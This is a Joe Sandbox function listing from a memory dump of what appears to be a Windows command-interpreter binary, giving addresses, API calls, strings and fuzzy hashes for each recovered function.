                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                              • String ID: @P
                              • API String ID: 1801357106-3670739982
                              • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                              • Instruction ID: 44f063000f15a026af8b345ed095fe525cd04727a32d0ced4f90ea06543f8071
                              • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                              • Instruction Fuzzy Hash: 72414C33B08A45DFE710AF62D4802EDABB0FB89759F884231DE0D42A88DF78D548D760
                              Function 00007FF744F02220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$BufferConsoleInfoScreen
                              • String ID:
                              • API String ID: 1034426908-0
                              • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                              • Instruction ID: 548b38d9f9e044807c3455d3ea48a80ef51f6f19f245c266fc9d95f397592a1e
                              • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                              • Instruction Fuzzy Hash: 33F16F32A0C682CAEB64FF2298942E9E7A5FF85744F884135DE4E476D9DF38E504D720
                              Function 00007FF744F1823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorFileFindFirstLast
                              • String ID:
                              • API String ID: 873889042-0
                              • Opcode ID: 11074d3c224ce67514852d4966aba4998422fc44b58f31243b65843f6fe49b86
                              • Instruction ID: 4d970e029669f59d066a17517b83e3c43bfb6b9470c017bb9cec167c1c2c28f4
                              • Opcode Fuzzy Hash: 11074d3c224ce67514852d4966aba4998422fc44b58f31243b65843f6fe49b86
                              • Instruction Fuzzy Hash: B4510675A0DB82C6E700BF12A584579BBA0FB59B91FDCA135CE5D43398CF3CE854A620
                              Function 00007FF744F2AC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseValue$CreateDeleteOpen
                              • String ID: %s=%s$\Shell\Open\Command
                              • API String ID: 4081037667-3301834661
                              • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                              • Instruction ID: 3267d56555a8c122cb016669518a906a2ca0a54083354c5a36043c1678b183d5
                              • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                              • Instruction Fuzzy Hash: 10719F21B0DB42C2EB60BF66A4902B9E2A1FF85794FC84531DE4E077D8DE7DD541A720
                              Function 00007FF744F2AA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2AA85
                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2AACF
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2AAEC
                              • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2AB39
                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2AB6F
                              • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2ABA4
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2ABCB
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseDeleteValue$CreateOpen
                              • String ID: %s=%s
                              • API String ID: 1019019434-1087296587
                              • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                              • Instruction ID: 9d44f525145640c7b39c463dc3ad528ab05c914b5cfee0453faf2141285b556a
                              • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                              • Instruction Fuzzy Hash: 4A519331B0CB52C6E760BF66A48476AB6A1FB89790F884234CE5D83BD8DF39D441D710
                              Function 00007FF744F01884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmpwcsrchr
                              • String ID: COPYCMD
                              • API String ID: 2429825313-3727491224
                              • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                              • Instruction ID: 9f371ae61072595878d934bd41e3b6ce2c43283b6d58afd50337ea8abb0e0879
                              • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                              • Instruction Fuzzy Hash: C5F1AF22F0C612CAFB60BF5295842BDB2A1BB44799F884235DE5D236DCDF3DA441E360
                              Function 00007FF744F04A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$FullNamePathwcsrchr
                              • String ID:
                              • API String ID: 4289998964-0
                              • Opcode ID: a87f38e7084cdb4239e3b2ad203ee547c7878674192c8843f3c2c45cb4b7c7ea
                              • Instruction ID: f6665cea42284cb4fe09f999214e6d988049e7944168af40bfc8b9259231b346
                              • Opcode Fuzzy Hash: a87f38e7084cdb4239e3b2ad203ee547c7878674192c8843f3c2c45cb4b7c7ea
                              • Instruction Fuzzy Hash: D3C1F452A0D346C2EB94BF839588379E7A0FB85B90F895930CE0E077D9DF3DA451A320
                              Function 00007FF744F2BCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                              • String ID:
                              • API String ID: 3476366620-0
                              • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                              • Instruction ID: 1d84f237925144ef2e2768d597958e5d9f0a2e2be4203d995c14b7b59a1acc41
                              • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                              • Instruction Fuzzy Hash: F4212C2191CA43D6FB14BF22A8952B8EA60FF49B15FCC5275CD1E422E9DF3DA405E320
                              Function 00007FF744F03D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                              • String ID: %9d
                              • API String ID: 1006866328-2241623522
                              • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                              • Instruction ID: eb09f090510d4698a4e6352788c1364ff7fa4911b5ddc402d08d82a212640135
                              • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                              • Instruction Fuzzy Hash: 11516E72A0C642CAE700FF52A8845A9BBA0FB44764FC94635DE6D537D9CF3CE544AB20
                              Function 00007FF744F08DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                              • Instruction ID: c2b739572ef68cd92951dde622ae732bc83c249e529814677412242b5def3ac2
                              • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                              • Instruction Fuzzy Hash: F7C1C422A0DA82C6EB60FF22E8D4AB9A3A4FB94744F884135DE1D07BD9DF3CD5419310
                              Function 00007FF744F09B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                              • Instruction ID: 447974408aab9bc844bfc6f365a6db4e8dbf163e7eb1db1fbb951be4b70f9f64
                              • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                              • Instruction Fuzzy Hash: 73A1A521A1D642C6EB54BF17A4D5A79A6A0FF84B80FC85135DE4E43BD9EE3CE401A720
                              Function 00007FF744F2FB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$DiskFreeSpace
                              • String ID: %5lu
                              • API String ID: 2448137811-2100233843
                              • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                              • Instruction ID: 9ba5bbb760222d9f3e50bb94fca72a3518c83f8514944fae1ae2ac137ba7a240
                              • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                              • Instruction Fuzzy Hash: DD415D6260DAC1C6EB61FF52E8846EAA360FB84784F888035DE4D0B78CDE7CD649D710
                              Function 00007FF744F0D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp
                              • String ID: GeToken: (%x) '%s'
                              • API String ID: 2081463915-1994581435
                              • Opcode ID: e3a6cb9c4f4fe1a277f0a8ebff47e1c814c31c2abc96469986f3b1ea96a28bad
                              • Instruction ID: e4cfa7019165d66532d251d3522cb9514d7b272bac0d6f968ef544af81e608a6
                              • Opcode Fuzzy Hash: e3a6cb9c4f4fe1a277f0a8ebff47e1c814c31c2abc96469986f3b1ea96a28bad
                              • Instruction Fuzzy Hash: 23719A20E0D256C6FB64BF67A8C8275A6A0EF90740FCC4539DE1D426EDDF3CB481A621
                              Function 00007FF744F081D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr
                              • String ID:
                              • API String ID: 1497570035-0
                              • Opcode ID: 953991e5515e9720921bfd82a5a30b3c869f8d800aebf2b352ed82d5cf5886c3
                              • Instruction ID: b86c78a9b01e62e6fd48c36146d0ea52f025906926efc127f9d173a5efc8f338
                              • Opcode Fuzzy Hash: 953991e5515e9720921bfd82a5a30b3c869f8d800aebf2b352ed82d5cf5886c3
                              • Instruction Fuzzy Hash: 4CC1B221A1CA82C2EB54BF1794D42B9E7A0FB84794F8C4135DE9E476DDDE3CE840A720
                              Function 00007FF744F27B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstNext
                              • String ID:
                              • API String ID: 3541575487-0
                              • Opcode ID: 565e35bf3077f6e5330a4c685e4702854ac746395b3091a84d0a46ce28e859e6
                              • Instruction ID: d61149514a43ab2036c98863ef2b929d7d0542826d55bcf66414152c0df0254d
                              • Opcode Fuzzy Hash: 565e35bf3077f6e5330a4c685e4702854ac746395b3091a84d0a46ce28e859e6
                              • Instruction Fuzzy Hash: 1BA1D361B1CA92C1EB54BF679594279E2D0BF44BE0FC84235DE6E477C8EE3DE441A220
                              Function 00007FF744F06BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F0CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                                • Part of subcall function 00007FF744F0CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              • _pipe.MSVCRT ref: 00007FF744F06C1E
                              • _get_osfhandle.MSVCRT ref: 00007FF744F06CD1
                              • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF744F06CFB
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                              • String ID:
                              • API String ID: 624391571-0
                              • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                              • Instruction ID: a863f0d846dc0a59e5bc9e6081c2d4957d512816482c9ab91de76b57ea97742b
                              • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                              • Instruction Fuzzy Hash: 2E716C31A0C642C6F754BF66D889478B6A1FF84B54F9C8234DE5D562EACF3CA841A720
                              Function 00007FF744F263FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CurrentDebugDebuggerOutputPresentStringThread
                              • String ID:
                              • API String ID: 4268342597-0
                              • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                              • Instruction ID: 28d81dc518c8433830a57706e7986e37192707fa8cfb7f31a17a2ec36546c318
                              • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                              • Instruction Fuzzy Hash: CA810A22A0CB82C2FB64BF27A480239B6A0FB55B84F9D4135CD4D07799DF3DE585A760
                              Function 00007FF744F188C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: OpenToken$CloseProcessThread
                              • String ID:
                              • API String ID: 2991381754-0
                              • Opcode ID: 55e115f10c8d4ea653a789ede48b69880637abd9560beca918893f9813f02e72
                              • Instruction ID: 04a199acda42a23f5edfedf3a00bd46404f3c391ead122b24aef6da14e4bbf48
                              • Opcode Fuzzy Hash: 55e115f10c8d4ea653a789ede48b69880637abd9560beca918893f9813f02e72
                              • Instruction Fuzzy Hash: 1C215C32A0CA82C7E700BF56D5802B9A760EB85BA1FD84135DF59466D8DF78E849DB10
                              Function 00007FF744F0586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                              Download Yara Rule
                              APIs
                              • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF744F2C59E), ref: 00007FF744F05879
